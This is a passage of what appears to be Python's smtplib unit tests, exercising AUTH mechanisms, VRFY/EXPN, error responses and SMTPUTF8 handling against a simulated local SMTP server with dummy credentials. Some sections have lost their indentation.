m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
    """Exercise SMTP objects that never open a connection."""

    def testNotConnected(self):
        # Operations on an unconnected SMTP object should raise
        # SMTPServerDisconnected rather than, say, an AttributeError
        # from referencing a nonexistent socket.
        client = smtplib.SMTP()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            client.ehlo()
        with self.assertRaises(smtplib.SMTPServerDisconnected):
            client.send('test msg')

    def testNonnumericPort(self):
        # A port that cannot be converted to an integer raises OSError,
        # whether given separately or embedded in the host string.
        for ctor_args in (("localhost", "bogus"), ("localhost:bogus",)):
            with self.assertRaises(OSError):
                smtplib.SMTP(*ctor_args)

    def testSockAttributeExists(self):
        # Regression test: the sock attribute must exist (as None)
        # before connect() has ever been called.
        with smtplib.SMTP() as smtp:
            self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
    """Check the default mail_options applied by SMTP.send_message()."""

    def setUp(self):
        self.msg = EmailMessage()
        self.msg['From'] = 'Páolo <főo@bar.com>'
        self.smtp = smtplib.SMTP()
        self.smtp.ehlo = Mock(return_value=(200, 'OK'))
        self.smtp.has_extn = Mock()
        self.smtp.sendmail = Mock()

    def testSendMessage(self):
        # Every call must pass the same default options; repeated sends
        # must not accumulate duplicate entries.
        expected = ('SMTPUTF8', 'BODY=8BITMIME')
        for _ in range(2):
            self.smtp.send_message(self.msg)
        for call in self.smtp.sendmail.call_args_list:
            self.assertEqual(call[0][3], expected)

    def testSendMessageWithMailOptions(self):
        # Caller-supplied options are merged with the defaults without
        # mutating the caller's list.
        options = ['STARTTLS']
        self.smtp.send_message(self.msg, None, None, options)
        self.assertEqual(options, ['STARTTLS'])
        self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
                         ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME'))
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
    """Verify the client refuses a server whose greeting is not 2xx."""

    def setUp(self):
        # Swap in the mock socket module so no real connection happens,
        # and have it answer every client with a non-success greeting.
        smtplib.socket = mock_socket
        mock_socket.reply_with(b"199 no hello for you!")
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.port = 25

    def tearDown(self):
        # Undo the module patching from setUp.
        smtplib.socket = socket
        sys.stdout = self.old_stdout

    def testFailingHELO(self):
        with self.assertRaises(smtplib.SMTPConnectError):
            smtplib.SMTP(HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
    """The client must reject a reply line longer than smtplib._MAXLINE."""
    # Server reply deliberately twice the permitted line length.
    respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
    def setUp(self):
        self.thread_key = threading_setup()
        self.old_stdout = sys.stdout
        self.output = io.StringIO()
        sys.stdout = self.output
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(15)
        self.port = socket_helper.bind_port(self.sock)
        servargs = (self.evt, self.respdata, self.sock)
        self.thread = threading.Thread(target=server, args=servargs)
        self.thread.start()
        # wait for the server thread to signal it is ready
        self.evt.wait()
        self.evt.clear()
    def tearDown(self):
        self.evt.wait()
        sys.stdout = self.old_stdout
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)
    def testLineTooLong(self):
        self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
                          HOST, self.port, 'localhost', 3)
# Address book consulted by the simulated server's VRFY handler.
sim_users = {'Mr.A@somewhere.com':'John A',
             'Ms.B@xn--fo-fka.com':'Sally B',
             'Mrs.C@somewhereesle.com':'Ruth C',
            }
# (username, password) pair accepted by the simulated AUTH mechanisms.
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
# Fixed base64 challenge returned by the simulated CRAM-MD5 handler.
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
                          'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
# Mailing lists expanded by the simulated EXPN handler.
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
             'list-2':['Ms.B@xn--fo-fka.com',],
            }
# Simulated SMTP channel & server
class ResponseException(Exception):
    """Raised by simulated AUTH handlers to abort with an SMTP error reply."""
class SimSMTPChannel(smtpd.SMTPChannel):
    """smtpd channel extended with AUTH support and per-command response
    overrides (quit/mail/rcpt/data) so tests can simulate server behavior.
    """
    # Tests assign these to force canned replies from the smtp_* overrides.
    quit_response = None
    mail_response = None
    rcpt_response = None
    data_response = None
    rcpt_count = 0
    rset_count = 0
    disconnect = 0
    AUTH = 99  # Add protocol state to enable auth testing.
    authenticated_user = None
    def __init__(self, extra_features, *args, **kw):
        # Pre-render the extra EHLO feature lines advertised by smtp_EHLO.
        self._extrafeatures = ''.join(
            [ "250-{0}\r\n".format(x) for x in extra_features ])
        super(SimSMTPChannel, self).__init__(*args, **kw)
    # AUTH related stuff.  It would be nice if support for this were in smtpd.
    def found_terminator(self):
        # While in the AUTH state, feed each received line to the active
        # auth handler instead of the normal command dispatcher.
        if self.smtp_state == self.AUTH:
            line = self._emptystring.join(self.received_lines)
            print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
            self.received_lines = []
            try:
                self.auth_object(line)
            except ResponseException as e:
                self.smtp_state = self.COMMAND
                self.push('%s %s' % (e.smtp_code, e.smtp_error))
                return
        super().found_terminator()
    def smtp_AUTH(self, arg):
        if not self.seen_greeting:
            self.push('503 Error: send EHLO first')
            return
        if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
            self.push('500 Error: command "AUTH" not recognized')
            return
        if self.authenticated_user is not None:
            self.push(
                '503 Bad sequence of commands: already authenticated')
            return
        args = arg.split()
        if len(args) not in [1, 2]:
            self.push('501 Syntax: AUTH <mechanism> [initial-response]')
            return
        # Dispatch to _auth_<mechanism> (e.g. AUTH CRAM-MD5 -> _auth_cram_md5).
        auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
        try:
            self.auth_object = getattr(self, auth_object_name)
        except AttributeError:
            self.push('504 Command parameter not implemented: unsupported '
                      ' authentication mechanism {!r}'.format(auth_object_name))
            return
        self.smtp_state = self.AUTH
        self.auth_object(args[1] if len(args) == 2 else None)
    def _authenticated(self, user, valid):
        # Finish an AUTH exchange and fall back to the COMMAND state.
        if valid:
            self.authenticated_user = user
            self.push('235 Authentication Succeeded')
        else:
            self.push('535 Authentication credentials invalid')
        self.smtp_state = self.COMMAND
    def _decode_base64(self, string):
        return base64.decodebytes(string.encode('ascii')).decode('utf-8')
    def _auth_plain(self, arg=None):
        if arg is None:
            self.push('334 ')
        else:
            logpass = self._decode_base64(arg)
            try:
                *_, user, password = logpass.split('\0')
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password'
                          ' failed: {}'.format(logpass, e))
                return
            self._authenticated(user, password == sim_auth[1])
    def _auth_login(self, arg=None):
        if arg is None:
            # base64 encoded 'Username:'
            self.push('334 VXNlcm5hbWU6')
        elif not hasattr(self, '_auth_login_user'):
            self._auth_login_user = self._decode_base64(arg)
            # base64 encoded 'Password:'
            self.push('334 UGFzc3dvcmQ6')
        else:
            password = self._decode_base64(arg)
            self._authenticated(self._auth_login_user, password == sim_auth[1])
            del self._auth_login_user
    def _auth_buggy(self, arg=None):
        # This AUTH mechanism will 'trap' client in a neverending 334
        # base64 encoded 'BuGgYbUgGy'
        self.push('334 QnVHZ1liVWdHeQ==')
    def _auth_cram_md5(self, arg=None):
        if arg is None:
            self.push('334 {}'.format(sim_cram_md5_challenge))
        else:
            logpass = self._decode_base64(arg)
            try:
                user, hashed_pass = logpass.split()
            except ValueError as e:
                self.push('535 Splitting response {!r} into user and password '
                          'failed: {}'.format(logpass, e))
                return False
            valid_hashed_pass = hmac.HMAC(
                sim_auth[1].encode('ascii'),
                self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
                'md5').hexdigest()
            self._authenticated(user, hashed_pass == valid_hashed_pass)
    # end AUTH related stuff.
    def smtp_EHLO(self, arg):
        resp = ('250-testhost\r\n'
                '250-EXPN\r\n'
                '250-SIZE 20000000\r\n'
                '250-STARTTLS\r\n'
                '250-DELIVERBY\r\n')
        resp = resp + self._extrafeatures + '250 HELP'
        self.push(resp)
        self.seen_greeting = arg
        self.extended_smtp = True
    def smtp_VRFY(self, arg):
        # For max compatibility smtplib should be sending the raw address.
        if arg in sim_users:
            self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
        else:
            self.push('550 No such user: %s' % arg)
    def smtp_EXPN(self, arg):
        list_name = arg.lower()
        if list_name in sim_lists:
            user_list = sim_lists[list_name]
            for n, user_email in enumerate(user_list):
                quoted_addr = smtplib.quoteaddr(user_email)
                if n < len(user_list) - 1:
                    self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
                else:
                    self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
        else:
            self.push('550 No access for you!')
    def smtp_QUIT(self, arg):
        if self.quit_response is None:
            super(SimSMTPChannel, self).smtp_QUIT(arg)
        else:
            self.push(self.quit_response)
            self.close_when_done()
    def smtp_MAIL(self, arg):
        if self.mail_response is None:
            super().smtp_MAIL(arg)
        else:
            self.push(self.mail_response)
            if self.disconnect:
                self.close_when_done()
    def smtp_RCPT(self, arg):
        if self.rcpt_response is None:
            super().smtp_RCPT(arg)
            return
        self.rcpt_count += 1
        self.push(self.rcpt_response[self.rcpt_count-1])
    def smtp_RSET(self, arg):
        self.rset_count += 1
        super().smtp_RSET(arg)
    def smtp_DATA(self, arg):
        if self.data_response is None:
            super().smtp_DATA(arg)
        else:
            self.push(self.data_response)
    def handle_error(self):
        # Propagate errors instead of asyncore's default logging, so
        # failures surface in the tests.
        raise
class SimSMTPServer(smtpd.SMTPServer):
    """smtpd server that opens SimSMTPChannel channels and records the
    envelope addresses of each processed message in self._addresses."""
    channel_class = SimSMTPChannel
    def __init__(self, *args, **kw):
        self._extra_features = []
        self._addresses = {}
        smtpd.SMTPServer.__init__(self, *args, **kw)
    def handle_accepted(self, conn, addr):
        self._SMTPchannel = self.channel_class(
            self._extra_features, self, conn, addr,
            decode_data=self._decode_data)
    def process_message(self, peer, mailfrom, rcpttos, data):
        # Record the envelope so tests can inspect sender/recipients.
        self._addresses['from'] = mailfrom
        self._addresses['tos'] = rcpttos
    def add_feature(self, feature):
        # Extra "250-" feature lines advertised by the channel's EHLO reply.
        self._extra_features.append(feature)
    def handle_error(self):
        # Propagate errors instead of asyncore's default logging.
        raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
    def test_smtputf8_NotSupportedError_if_no_server_support(self):
        """Requesting the SMTPUTF8 mail option against a server that does
        not advertise it must raise SMTPNotSupportedError, both from
        sendmail() and from the lower-level mail() call."""
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        # Sanity: ESMTP is on, but smtputf8 is not among the extensions.
        self.assertTrue(smtp.does_esmtp)
        self.assertFalse(smtp.has_extn('smtputf8'))
        self.assertRaises(
            smtplib.SMTPNotSupportedError,
            smtp.sendmail,
            'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
        self.assertRaises(
            smtplib.SMTPNotSupportedError,
            smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
    def test_send_unicode_without_SMTPUTF8(self):
        """Non-ASCII addresses without the SMTPUTF8 option must fail to
        encode (UnicodeEncodeError) rather than be sent mangled."""
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
        self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
    def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
        """send_message() with non-ASCII envelope addresses must raise
        SMTPNotSupportedError when the server lacks SMTPUTF8."""
        # This test is located here and not in the SMTPUTF8SimTests
        # class because it needs a "regular" SMTP server to work
        msg = EmailMessage()
        msg['From'] = "Páolo <főo@bar.com>"
        msg['To'] = 'Dinsdale'
        msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        with self.assertRaises(smtplib.SMTPNotSupportedError):
            smtp.send_message(msg)
    def test_name_field_not_included_in_envelop_addresses(self):
        """send_message() must put only the bare addr-spec into the SMTP
        envelope, stripping the display-name part of From/To headers."""
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        message = EmailMessage()
        message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
        message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
        # Empty dict: no recipient was refused.
        self.assertDictEqual(smtp.send_message(message), {})
        self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
        self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
    """Simulated server that advertises SMTPUTF8 and 8BITMIME and records
    the envelope, payload and options of the last message received, so
    tests can assert on exactly what the server saw."""

    def __init__(self, *args, **kw):
        # The base SMTP server turns these on automatically, but our test
        # server is set up to munge the EHLO response, so we need to provide
        # them as well. And yes, the call is to SMTPServer not SimSMTPServer.
        self._extra_features = ['SMTPUTF8', '8BITMIME']
        smtpd.SMTPServer.__init__(self, *args, **kw)

    def handle_accepted(self, conn, addr):
        # Build the channel by hand so the extra EHLO features are injected.
        self._SMTPchannel = self.channel_class(
            self._extra_features, self, conn, addr,
            decode_data=self._decode_data,
            enable_SMTPUTF8=self.enable_SMTPUTF8,
        )

    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
                        rcpt_options=None):
        # Stash everything for later inspection by the tests.
        self.last_peer = peer
        self.last_mailfrom = mailfrom
        self.last_rcpttos = rcpttos
        self.last_message = data
        self.last_mail_options = mail_options
        self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
    """Tests exercising the SMTPUTF8 extension against a simulated server
    (SimSMTPUTF8Server) that advertises SMTPUTF8 and 8BITMIME."""

    # Show full diffs for the multi-line message comparisons below.
    maxDiff = None

    def setUp(self):
        self.thread_key = threading_setup()
        # Avoid real DNS lookups from the test suite.
        self.real_getfqdn = socket.getfqdn
        socket.getfqdn = mock_socket.getfqdn
        self.serv_evt = threading.Event()
        self.client_evt = threading.Event()
        # Pick a random unused port by passing 0 for the port number
        self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
                                      decode_data=False,
                                      enable_SMTPUTF8=True)
        # Keep a note of what port was assigned
        self.port = self.serv.socket.getsockname()[1]
        serv_args = (self.serv, self.serv_evt, self.client_evt)
        self.thread = threading.Thread(target=debugging_server, args=serv_args)
        self.thread.start()

        # wait until server thread has assigned a port number
        self.serv_evt.wait()
        self.serv_evt.clear()

    def tearDown(self):
        socket.getfqdn = self.real_getfqdn
        # indicate that the client is finished
        self.client_evt.set()
        # wait for the server thread to terminate
        self.serv_evt.wait()
        join_thread(self.thread)
        del self.thread
        self.doCleanups()
        threading_cleanup(*self.thread_key)

    def test_test_server_supports_extensions(self):
        # Sanity check for the fixture itself: the simulated server must
        # actually advertise smtputf8.
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        self.assertTrue(smtp.does_esmtp)
        self.assertTrue(smtp.has_extn('smtputf8'))

    def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
        """Non-ASCII envelope addresses pass through sendmail() intact when
        the SMTPUTF8 mail option is requested."""
        m = '¡a test message containing unicode!'.encode('utf-8')
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        smtp.sendmail('Jőhn', 'Sálly', m,
                      mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
        self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
        self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
        self.assertEqual(self.serv.last_message, m)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])

    def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
        """Same as above but driving mail()/rcpt()/data() directly."""
        m = '¡a test message containing unicode!'.encode('utf-8')
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        smtp.ehlo()
        self.assertEqual(
            smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
            (250, b'OK'))
        self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
        self.assertEqual(smtp.data(m), (250, b'OK'))
        self.assertEqual(self.serv.last_mailfrom, 'Jő')
        self.assertEqual(self.serv.last_rcpttos, ['János'])
        self.assertEqual(self.serv.last_message, m)
        self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
        self.assertIn('SMTPUTF8', self.serv.last_mail_options)
        self.assertEqual(self.serv.last_rcpt_options, [])

    def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
        """send_message() must auto-select SMTPUTF8/8BITMIME when any
        envelope address contains non-ASCII characters."""
        msg = EmailMessage()
        msg['From'] = "Páolo <főo@bar.com>"
        msg['To'] = 'Dinsdale'
        msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
        # XXX I don't know why I need two \n's here, but this is an existing
        # bug (if it is one) and not a problem with the new functionality.
        msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
        # XXX smtpd converts received /r/n to /n, so we can't easily test that
        # we are successfully sending /r/n :(.
        expected = textwrap.dedent("""\
            From: Páolo <főo@bar.com>
            To: Dinsdale
            Subject: Nudge nudge, wink, wink \u1F609
            Content-Type: text/plain; charset="utf-8"
            Content-Transfer-Encoding: 8bit
            MIME-Version: 1.0

            oh là là, know what I mean, know what I mean?
            """)
        smtp = smtplib.SMTP(
            HOST, self.port, local_hostname='localhost',
            timeout=support.LOOPBACK_TIMEOUT)
        self.addCleanup(smtp.close)
        self.assertEqual(smtp.send_message(msg), {})
        self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
